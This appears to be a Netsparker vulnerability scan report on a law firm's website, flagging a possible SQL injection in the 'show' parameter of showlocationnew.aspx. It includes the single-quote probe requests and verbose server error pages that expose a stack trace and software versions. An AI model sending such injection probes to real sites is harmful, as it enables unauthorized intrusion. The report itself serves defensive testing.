YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTM1NDAiIGNsYXNzPSJib2R5Y29weSJcPkUtRGlzY292ZXJ5XDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MyIgY2xhc3M9ImJvZHljb3B5Ilw+RW52aXJvbm1lbnRhbFw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTIzIiBjbGFzcz0iYm9keWNvcHkiXD5FeGVjdXRpdmUgQ29tcGVuc2F0aW9uXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MTkiIGNsYXNzPSJib2R5Y29weSJcPkZyYW5jaGlzaW5nIGFuZCBEaXN0cmlidXRpb24gTGF3XDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MjAiIGNsYXNzPSJib2R5Y29weSJcPkdvdmVybm1lbnQgQ29udHJhY3RzXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9OSIgY2xhc3M9ImJvZHljb3B5Ilw+R292ZXJubWVudCBJbnZlc3RpZ2F0aW9ucyAmIFdoaXRlIENvbGxhciBDcmltaW5hbCBEZWZlbnNlXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9NSIgY2xhc3M9ImJvZHljb3B5Ilw+SGVhbHRoIENhcmVcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0xOCIgY2xhc3M9ImJvZHljb3B5Ilw+SW1taWdyYXRpb25cPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz02IiBjbGFzcz0iYm9keWNvcHkiXD5JbnN1cmFuY2UgQ292ZXJhZ2VcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0xMiIgY2xhc3M9ImJvZHljb3B5Ilw+SW50ZWxsZWN0dWFsIFByb3BlcnR5L0luZm9ybWF0aW9uIFRlY2hub2xvZ3lcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0yNzI2IiBjbGFzcz0iYm9keWNvcHkiXD5JbnRlcm5hdGlvbmFsXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MjIiIGNsYXNzPSJib2R5Y29weSJcPkludmVzdG1lbnQgTWFuYWdlbWVudFw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTIiIGNsYXNzPSJib2R5Y29weSJcPkxhYm9yICYgRW1wbG95bWVudCBMYXdcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz00IiBjbGFzcz0iYm9keWNvcHkiXD5Qcml2YXRlIENsaWVudHNcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz03IiBjbGFzcz0iYm9keWNvcHkiXD5Qcm9kdWN0IExpYWJpbGl0eVw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTEzIiBjbGFzcz0iYm9keWNvcHkiXD5QdWJsaWMgRmluYW5jZVw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTIxIiBjbGFzcz0iYm9keWNvcHkiXD5QdWJsaWMgU3RyYXRlZ3lcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz04IiBjbGFzcz0iYm9keWNvcHkiXD5SZWFsIEVzdGF0ZVw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE3IiBjbGFzcz0iYm9keWNvcHkiXD5SZWRldmVsb3BtZW50XDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MTAiIGNsYXNzPSJib2R5Y29weSJcPlRheCAmIEJlbmVmaXRzXDwvYVw+Oz4+Ozs+Oz4+Oz4+Oz4+Oz4+Oz4+Oz6ANTnCzoZAZ/zlQUvi27d+YrBvXA==" />

<table cellpadding=0 cellspacing=0 border=0>

<tr>

<td width="328">

<script language="VBscript">
sub RandomizeImages1()
Dim randomNum1, highestNumber1, lowestNumber1

lowestNumber1=1
highestNumber1=10
RANDOMIZE
randomNum1 = Int((highestNumber1 - lowestNumber1 + 1) * Rnd + lowestNumber1)

document.all("image1").src = "images/New Mccarter/imagerotation1/new" & randomNum1 & ".jpg"

end sub
</script>

<table style="BORDER-LEFT: #cccccc 1px solid;border-right:0px;margin-right:0px">
<tr>
<td width="9px">&nbsp;</td>
<td>
<div id="Imgset" style="width:328px;height:225px;bgcolor:#969696">
<img id="image1" width="328" height="225" name="image1" src="images/New Mccarter/imagerotation1/new5.jpg" onclick="RandomizeImages1()" border=0 style="cursor:hand">
</div>
</td>
</tr>
</table>


<!--DWLayoutTable-->
<table style="BORDER-LEFT: #cccccc 1px solid;" cellpadding=0 cellspacing=0 width="320px" height="300px">
<tr>
<td style="width:9px">&nbsp;</td>
<td colspan=2>&nbsp;</td>
</tr>
<tr>
<td width="9px">&nbsp;</td>
<td colspan=2>

<a href="homenew.aspx"><img src="images/New%20Mccarter/McCarterTaglineLogo.gif" border=0></a>

</td>
</tr>
<tr>
<td style="width:9px">&nbsp;</td>
<td colspan=2>&nbsp;</td>
</tr>
<tr>
<td style="width:9px">&nbsp;</td>
<!--updated on 07/14/2007 - width cahnged from 91 to 80-->
<td colspan="2" valign="top" width="80px">
<script language="javascript">
//alert(document.getElementById('submenu1').style.visibility);
function HideSubmenuOverview()
{
document.getElementById('submenu1').style.visibility = "hidden"
document.getElementById('about').src = "images/New%20Mccarter/Navigation/overview.gif"
}
function ShowSubmenuOverview()
{
document.getElementById('submenu1').style.visibility = "visible"
document.getElementById('submenu1').style.Top = "0px"
document.getElementById('about').src = "images/New%20Mccarter/Navigation/overview_on.gif"
}
function HideSubmenuOffices()
{
document.getElementById('submenu6').style.visibility = "hidden"
document.getElementById('office').src = "images/New%20Mccarter/Navigation/offices.gif"
}
function ShowSubmenuOffices()
{
document.getElementById('submenu6').style.visibility = "visible"
document.getElementById('office').src = "images/New%20Mccarter/Navigation/offices_on.gif"
}
function HideSubmenuPractice()
{
document.getElementById('submenu3').style.visibility = "hidden"
document.getElementById('practices').src = "images/New%20Mccarter/Navigation/practices.gif"
}
function ShowSubmenuPractice()
{
document.getElementById('submenu3').style.visibility = "visible"
document.getElementById('practices').src = "images/New%20Mccarter/Navigation/practices_on.gif"
}
function HideSubmenuClients()
{
document.getElementById('clients').src = "im..
[Possible] SQL Injection

[Possible] SQL Injection

4 TOTAL
LOW
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. However this issue could not be confirmed by Netsparker. Netsparker believes that this was not an SQL Injection however there were some indications of a possible SQL Injection. There can be numerous reasons for Netsparker not being able to confirm it. We strongly recommend investigating the issue manually. You can also consider sending the details of this issue to us, so we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /new/showlocationnew.aspx

/new/showlocationnew.aspx

http://www.mccarter.com/new/showlocationnew.aspx?show=%2527

Parameters

Parameter Type Value
show GET %27

Request

GET /new/showlocationnew.aspx?show=%2527 HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4343


<html>
<head>
<title>Incorrect syntax near '27'.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Incorrect syntax near '27'.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Incorrect syntax near '27'.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Incorrect syntax near '27'.]
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream) +742
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior) +45
_SaturnoTools.Library.libData.GetReader(String strSQL) +143
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Incorrect syntax near '27'.
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream)
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior)
at _SaturnoTools.Library.libData.GetReader(String strSQL)
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /new/showlocationnew.aspx

/new/showlocationnew.aspx

http://www.mccarter.com/new/showlocationnew.aspx?PrintPage=True&Show=%2527&sortby=3&by=3&title=3&rel..

Parameters

Parameter Type Value
PrintPage GET True
Show GET %27
sortby GET 3
by GET 3
title GET 3
related GET 3

Request

GET /new/showlocationnew.aspx?PrintPage=True&Show=%2527&sortby=3&by=3&title=3&related=3 HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:37:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4343


<html>
<head>
<title>Incorrect syntax near '27'.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Incorrect syntax near '27'.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Incorrect syntax near '27'.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Incorrect syntax near '27'.]
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream) +742
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior) +45
_SaturnoTools.Library.libData.GetReader(String strSQL) +143
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Incorrect syntax near '27'.
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream)
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior)
at _SaturnoTools.Library.libData.GetReader(String strSQL)
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /new/showlocationnew.aspx

/new/showlocationnew.aspx

http://www.mccarter.com/new/showlocationnew.aspx?show=%2527

Parameters

Parameter Type Value
show GET %27
__VIEWSTATE POST dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM Oz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA O2k8MT47PjtsPHQ8O2w8aTwzPjs O2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciZuYnNwXDtcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQzMyIgaHR0cDogd3d3Lm1jY2FydGVyLmNvbSB3d3cyIGJpb3NuZXcuYXNweD9TZWFyY2g9J1RydWUmYW1wXDtMb2NhdGlvbj04IidcPiZuYnNwXDtCT1NUT04gT2ZmaWNlIExhd3llcnNcPC9hXD5cPGEgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQiXD5cPC9hXD5cPC9zdHJvbmdcPlw8L3BcPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9wXD5cPGZvbyBmYWNlPUFyaWFsIHNpemU9Mlw DQpcPHAgYWxpZ249bGVmdFw XDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gQm9zdG9uIE9mZmljZSBHYXJhZ2U6XDwvc3Ryb25nXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPHN0cm9uZ1w RnJvbSBwb2ludHMgTm9ydGg6IFw8L3N0cm9uZ1w VGFrZSBSb3V0ZSA5MyBTb3V0aCB0byBleGl0IDI0QS4gRXhpdCAyNEEgaXMgb24gdGhlIHJpZ2h0LCBhYm91dCAmIzE4OFw7IG1pbGUgYWZ0ZXIgeW91IGVudGVyIHRoZSB0dW5uZWwuIFN0YXkgdG8gdGhlIHJpZ2h0IHNpZGUgb2YgdGhlIGV4aXQgcmFtcCB1bnRpbCBleGl0IDI0QSBqb2lucyB0aGUgSkZLIFN1cmZhY2UgUm9hZCBhdCB0aGUgdHJhZmZpYyBsaWdodHMuIFRha2UgYSBsZWZ0IGF0IHRoZSBlbmQgb2YgdGhlIG9mZiByYW1wIChhdCBsaWdodHMpLiBGb2xsb3cgdGhlIFN1cmZhY2UgUm9hZCwga2VlcGluZyBCb3N0b24gSGFyYm9yIGFuZCB0aGUgTWFycmlvdHQtTG9uZyBXaGFyZiBIb3RlbCB0byB5b3VyIGxlZnQuIFRha2UgYSByaWdodCB0dXJuIG9udG8gQnJvYWQgU3RyZWV0LCBqdXN0IGFmdGVyIHBhc3NpbmcgdGhlIEhhcmJvciBQYXJraW5nIEdhcmFnZSBvbiB5b3VyIGxlZnQuIFRha2UgdGhlIDFzdCBsZWZ0LCB3aGljaCBpcyBGcmFua2xpbiBTdHJlZXQuIFByb2NlZWQgc3RyYWlnaHQgZm9yIDMgYmxvY2tzIGFuZCB0YWtlIGEgcmlnaHQgb250byBQZWFybCBTdHJlZXQsIGFuZCBhbiBpbW1lZGlhdGUgbGVmdCBpbnRvIHRoZSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIHBhcmsuIFw8aVw Rm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9pXD5cPHN0cm9uZ1w RnJvbSBwb2ludHMgU291dGg6Jm5ic3BcO1w8L3N0cm9uZ1w VGFrZSBSb3V0ZSA5MyBOb3J0aCB0byB0YWtlIGV4aXQgMjMuIFRha2UgYW4gaW1tZWRpYXRlIGxlZnQgb2ZmIHRoZSBleGl0IG9udG8gSm9obiBGLiBGaXR6Z2VyYWxkIFN1cmZhY2UgUmQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMsIGF0IHRoZSBGcmFua2xpbiBTdHJlZXQgaW50ZXJzZWN0aW9uLCB0aGUgZW50cmFuY2UgdG8gdGhlIGdhcmFnZSB3aWxsIGJlIGltbWVkaWF0ZWx5IG9uIHRoZSBsZWZ0LiBcPGVtXD5Gb3Igd2Fsa2luZyBkaXJlY3Rpb25zIGZyb20gdGhlIGdhcmFnZSB0byBvdXIgYnVpbGRpbmcsIHBsZWFzZSBzZWUgYmVsb3cuIFw8L2VtXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9mb29cPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD5cPHN0cm9uZ1w RnJvbSBMb2dhbiBBaXJwb3J0OiBcPC9zdHJvbmdcPkZvbGxvdyB0aGUgQWlycG9ydCBleGl0IHNpZ25zIHRvIEktOTAgV2VzdC9UaGUgVGVkIFdpbGxpYW1zIFR1bm5lbC4gVGFrZSBleGl0IDI1IC0gU291dGggQm9zdG9uLiBUdXJuIGxlZnQgb250byBOb3J0aGVybiBBdmVudWUvU2VhcG9ydCBCb3VsZXZhcmQuIFlvdSB3aWxsIGdvIG92ZXIgdGhlIE1vYWtsZXkgQnJpZGdlLCBhbmQgY29udGludWUgdG8gZm9sbG93IFNlYXBvcnQgQm91bGV2YXJkLiBUdXJuIGxlZnQgb250byBQdXJjaGFzZSBTdHJlZXQuIFR1cm4gcmlnaHQgb250byBQZWFybCBTdHJlZXQuIEFmdGVyIHRoZSBzZWNvbmQgc2V0IG9mIGxpZ2h0cywgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgb24gdGhlIGxlZnQgaGFuZCBzaWRlLiBcPGlcPkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSB0aGUgZ2FyYWdlIHRvIG91ciBidWlsZGluZywgcGxlYXNlIHNlZSBiZWxvdy4gXDwvcFw DQpcPHAgYWxpZ249bGVmdFw XDwvaVw XDxzdHJvbmdcPkZyb20gdGhlIE1hc3MgUGlrZTombmJzcFw7XDwvc3Ryb25nXD5Gb2xsb3cgdGhlIE1hc3NhY2h1c2V0dHMgVHVybnBpa2UgKDkwIEVhc3QpIGludG8gQm9zdG9uLiBUYWtlIGV4aXQgMjRCIHRvIEktOTMgTm9ydGggdG8gZXhpdCAyMy4gVGFrZSBhbiBpbW1lZGlhdGUgbGVmdCBvZmYgdGhlIGV4aXQgb250byBKb2huIEYuIEZpdHpnZXJhbGQgU3VyZmFjZSBSZC9TdXJmYWNlIFJvYWQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgaW1tZWRpYXRlbHkgb24gdGhlIGxlZnQuIFw8aVw Rm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD5cPC9pXD5cPC9mb29cPg0KXDxwIGFsaWduPWxlZnRcPlw8c3Ryb25nXD4qKkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIDI2NSBGcmFua2xpbiBTdHJlZXQqKlw8L3N0cm9uZ1w XDxpXD5cPGJyXD5cPC9pXD5XaGVuIHlvdSBjb21lIG91dCBvZiB0aGUgR2FyYWdlLCB0dXJuIGxlZnQoc3RheWluZyBvbiBGcmFua2xpbiBTdHJlZXQpYW5kIHByb2NlZWQgdG93YXJkcyB0aGUgTGFuZ2hhbSBIb3RlbC4gV2FsayBzdHJhaWdodCBkb3duIEZyYW5rbGluIFN0cmVldCB0d28gYmxvY2tzIHRvIG91ciBidWlsZGluZyBhdCAyNjUgRnJhbmtsaW4gU3RyZWV0LiBQbGVhc2UgY2hlY2sgaW4gYXQgdGhlIFNlY3VyaXR5IERlc2sgYW5kIHByb2NlZWQgdG8gdGhlIDE0XDxzdXBcPnRoXDwvc3VwXD4gRmxvb3IuIFw8L3BcPlw8Ylw DQpcPHAgYWxpZ249bGVmdFw XDwvcFw DQpcPHAgYWxpZ249bGVmdFw TUJUQSAoU3Vid2F5KSBEaXJlY3Rpb25zIFw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlJlZCBMaW5lXDwvYlw 